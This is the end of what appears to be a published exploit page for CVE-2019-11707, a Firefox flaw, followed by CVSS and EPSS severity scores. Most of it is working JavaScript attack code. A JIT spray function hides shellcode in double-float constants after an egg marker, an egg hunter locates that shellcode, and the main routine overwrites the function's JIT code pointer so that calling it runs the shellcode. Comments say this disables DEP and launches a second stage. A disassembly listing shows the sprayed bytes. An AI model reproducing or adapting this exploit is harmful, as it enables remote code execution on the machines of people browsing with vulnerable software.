In contrast, any JIT sprayed function with less than 100 double floats yields
a substantially different region of code at its JIT code pointer:

000002C6944D4470 | 48:8B4424 20             | mov rax,qword ptr ss:[rsp+20]    <- JIT code pointer for JIT sprayed function points here
000002C6944D4475 | 48:C1E8 2F               | shr rax,2F                              
000002C6944D4479 | 3D F3FF0100              | cmp eax,1FFF3                           
000002C6944D447E | 0F85 A4060000            | jne 2C6944D4B28                         
...
000002C6944D4ACB | F2:0F1180 C00A0000       | movsd qword ptr ds:[rax+AC0],xmm0       
000002C6944D4AD3 | F2:0F1005 6D030000       | movsd xmm0,qword ptr ds:[2C6944D4E48]   
000002C6944D4ADB | F2:0F1180 C80A0000       | movsd qword ptr ds:[rax+AC8],xmm0       
000002C6944D4AE3 | F2:0F1005 65030000       | movsd xmm0,qword ptr ds:[2C6944D4E50]   
000002C6944D4AEB | F2:0F1180 D00A0000       | movsd qword ptr ds:[rax+AD0],xmm0       
000002C6944D4AF3 | F2:0F1005 5D030000       | movsd xmm0,qword ptr ds:[2C6944D4E58]   
000002C6944D4AFB | F2:0F1180 D80A0000       | movsd qword ptr ds:[rax+AD8],xmm0       
000002C6944D4B03 | 48:B9 000000000080F9FF   | mov rcx,FFF9800000000000                
000002C6944D4B0D | C3                       | ret                                     
000002C6944D4B0E | 90                       | nop                                     
000002C6944D4B0F | 90                       | nop                                     
000002C6944D4B10 | 90                       | nop                                     
000002C6944D4B11 | 90                       | nop                                     
000002C6944D4B12 | 90                       | nop                                     
000002C6944D4B13 | 90                       | nop                                     
000002C6944D4B14 | 90                       | nop                                     
000002C6944D4B15 | 90                       | nop                                     
000002C6944D4B16 | 49:BB 30B14E5825000000   | mov r11,25584EB130                      
000002C6944D4B20 | 41:53                    | push r11                                
000002C6944D4B22 | E8 C9C6FBFF              | call 2C6944911F0                        
000002C6944D4B27 | CC                       | int3                                    
000002C6944D4B28 | 6A 00                    | push 0                                  
000002C6944D4B2A | E9 11000000              | jmp 2C6944D4B40                         
000002C6944D4B2F | 50                       | push rax                                
000002C6944D4B30 | 68 20080000              | push 820                                
000002C6944D4B35 | E8 5603FCFF              | call 2C694494E90                        
000002C6944D4B3A | 58                       | pop rax                                 
000002C6944D4B3B | E9 85F9FFFF              | jmp 2C6944D44C5                         
000002C6944D4B40 | 6A 00                    | push 0                                  
000002C6944D4B42 | E9 D9C5FBFF              | jmp 2C694491120                         
000002C6944D4B47 | F4                       | hlt                                     
000002C6944D4B48 | 41414141:0000            | add byte ptr ds:[r8],al          <- JIT sprayed egg double
000002C6944D4B4E | 0000                     | add byte ptr ds:[rax],al                
000002C6944D4B50 | 90                       | nop                              <- JIT sprayed shellcode begins here
000002C6944D4B51 | 90                       | nop                                     
000002C6944D4B52 | 55                       | push rbp                                
000002C6944D4B53 | 48:89E5                  | mov rbp,rsp                             
000002C6944D4B56 | 48:83EC 40               | sub rsp,40                              
000002C6944D4B5A | 48:83EC 08               | sub rsp,8                               
000002C6944D4B5E | 40:80E4 F7               | and spl,F7                              
000002C6944D4B62 | 48:B8 1122334455667788   | mov rax,8877665544332211                
000002C6944D4B6C | 48:8945 C8               | mov qword ptr ss:[rbp-38],rax           
000002C6944D4B70 | 48:C7C1 884E0D00         | mov rcx,D4E88                           
000002C6944D4B77 | E8 F9000000              | call 2C6944D4C75                        

This then introduces another constaint on JIT spraying beyoond forcing your
assembly bytecode to be 100% valid double floats. You are also limited to a
maximum of 100 doubles (800 bytes) including your egg prefix.
*/

function JITSprayFunc(){
    Egg = 5.40900888e-315; // AAAA\x00\x00\x00\x00
    X1 = 58394.27801956298;
    X2 = -3.384548150597339e+269;
    X3 = -9.154525457562153e+192;
    X4 = 4.1005939302288804e+42;
    X5 = -5.954550387086224e-264;
    X6 = -6.202600667005017e-264;
    X7 = 3.739444822644755e+67;
    X8 = -1.2650161464211396e+258;
    X9 = -2.6951286493033994e+35;
    X10 = 1.3116505146398627e+104;
    X11 = -1.311379727091241e+181;
    X12 = 1.1053351980286266e-265;
    X13 = 7.66487078033362e+42;
    X14 = 1.6679557218696946e-235;
    X15 = 1.1327634929857868e+27;
    X16 = 6.514949632148056e-152;
    X17 = 3.75559130646382e+255;
    X18 = 8.6919639111614e-311;
    X19 = -1.0771492276655187e-142;
    X20 = 1.0596460749348558e+39;
    X21 = 4.4990090566228275e-228;
    X22 = 2.6641556100123696e+41;
    X23 = -3.695293685173417e+49;
    X24 = 7.675324624976707e-297;
    X25 = 5.738262935249441e+40;
    X26 = 4.460149175031513e+43;
    X27 = 8.958658002980807e-287;
    X28 = -1.312880373645135e+35;
    X29 = 4.864674571015197e+42;
    X30 = -2.500435320470142e+35;
    X31 = -2.800945285957394e+277;
    X32 = 1.44103957698964e+28;
    X33 = 3.8566513062216665e+65;
    X34 = 1.37405680231e-312;
    X35 = 1.6258034990195507e-191;
    X36 = 1.5008582713363865e+43;
    X37 = 3.1154847750709123;
    X38 = -6.809578792021008e+214;
    X39 = -7.696699288147737e+115;
    X40 = 3.909631192677548e+112;
    X41 = 1.5636948002514616e+158;
    X42 = -2.6295656969507476e-254;
    X43 = -6.001472476578534e-264;
    X44 = 9.25337251529007e-33;
    X45 = 4.419915842157561e-80;
    X46 = 8.07076629722016e+254;
    X47 = 3.736523284e-314;
    X48 = 3.742120352320771e+254;
    X49 = 1.0785207713761078e-32;
    X50 = -2.6374368557341455e-254;
    X51 = 1.2702053652464168e+145;
    X52 = -1.3113796337500435e+181;
    X53 = 1.2024564583763433e+111;
    X54 = 1.1326406542153807e+104;
    X55 = 9.646933740426927e+39;
    X56 = -2.5677414592270957e-254;
    X57 = 1.5864445474697441e+233;
    X58 = -2.6689139052065564e-251;
    X59 = 1.0555057376604044e+27;
    X60 = 8.364524068863995e+42;
    X61 = 3.382975178824556e+43;
    X62 = -8.511722322449098e+115;
    X63 = -2.2763239573787572e+271;
    X64 = -6.163839243926498e-264;
    X65 = 1.5186209005088964e+258;
    X66 = 7.253360348539147e-192;
    X67 = -1.2560830051206045e+234;
    X68 = 1.102849544e-314;
    X69 = -2.276324008154652e+271;
    X70 = 2.8122150524016884e-71;
    X71 = 5.53602304257365e-310;
    X72 = -6.028598990540894e-264;
    X73 = 1.0553922879130128e+27;
    X74 = -1.098771600725952e-244;
    X75 = -2.5574368247075522e-254;
    X76 = 3.618778572061404e-171;
    X77 = -1.4656824334476123e+40;
    X78 = 4.6232700581905664e+42;
    X79 = -3.6562604268727894e+125;
    X80 = -2.927408487880894e+78;
    X81 = 1.087942540606703e-309;
    X82 = 6.440226123500225e+264;
    X83 = 3.879424446462186e+148;
    X84 = 3.234472631797124e+40;
    X85 = 1.4186706350383543e-307;
    X86 = 1.2617245769382784e-234;
    X87 = 1.3810793979336581e+43;
    X88 = 1.565026152201332e+43;
    X89 = 5.1402745833993635e+153;
    X90 = 9.63e-322;
}

function EggHunter(TargetAddressDbl) {
    var ScanPtr = TargetAddressDbl;

    for(var i = 0; i < 1000; i++) { // 1000 QWORDs give me the most stable result. The more double float constants are in the JIT'd function, the more handler code seems to precede them.
        HelperDbl[0] = ScanPtr;
        var DblVal = StrongLeakDbl(ScanPtr); // The JIT'd ASM code being scanned is likely to contain 8 byte sequences which will not be interpreted as doubles (and will have tagged pointer bits set). Use explicit/strong primitive for these reads.
        
        if(DblVal == 5.40900888e-315) {
            HelperDbl[0] = ScanPtr;
            HelperDword[0] = HelperDword[0] + 8; // Skip over egg bytes and return precise pointer to the shellcode
            return HelperDbl[0];
        }
        
        HelperDbl[0] = ScanPtr;
        HelperDword[0] = HelperDword[0] + 8;
        ScanPtr = HelperDbl[0];
    }
    
    return 0.0;
}

////////
////////
// Primary high level exploit logic
////////

function CVE_2019_11707() {
    for(var i = 0; i < JITIterations; i++) {
        JITSprayFunc(); // JIT spray the shellcode to a private +RX region of virtual memory
    }

    var JITCodePtr = GetJSFuncJITCodePtr(JITSprayFunc);
    
    if(JITCodePtr) {
        // Setup the strong read primitive for the stage one egg hunter: attempting to interpret assembly byte code as doubles via weak primitive may crash the process (tagged pointer bits could cause the read value to be dereferenced as a pointer)
        
        HelperDbl[0] = JITCodePtr;
        DebugLog("JIT spray code pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
        InitStrongRWPrimitive();
        ShellcodeAddress = EggHunter(JITCodePtr); // For this we need the strong read primitive since values here can start with 0xffff and thus act as tags

        if(ShellcodeAddress) {
            // Trigger code exec by calling the JIT sprayed function again. Its code pointer has been overwritten to now point to the literal shellcode data within the JIT'd function
            
            HelperDbl[0] = ShellcodeAddress;
            DebugLog("Shellcode pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
            var JITInfoAddress = GetJSFuncJITInfoPtr(JITSprayFunc);
            WeakWriteDbl(JITInfoAddress, ShellcodeAddress);
            JITSprayFunc(); // Notably the location of the data in the stage two shellcode Uint8Array can be found at offset 0x40 from the start of the array object when the array is small, and when it is large a pointer to it can be found at offset 0x38 from the start of the array object. In this case though, the stage one egg hunter shellcode finds, disables DEP and ADDITIONALLY executes the stage two shellcode itself, so there is no reason to locate/execute it from JS.
        }
        else {
            DebugLog("Failed to resolve shellcode address");
        }
    }
}

CVE_2019_11707();
</script>
</body>
</html>

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.4

Confidence

High

EPSS

0.782

Percentile

98.3%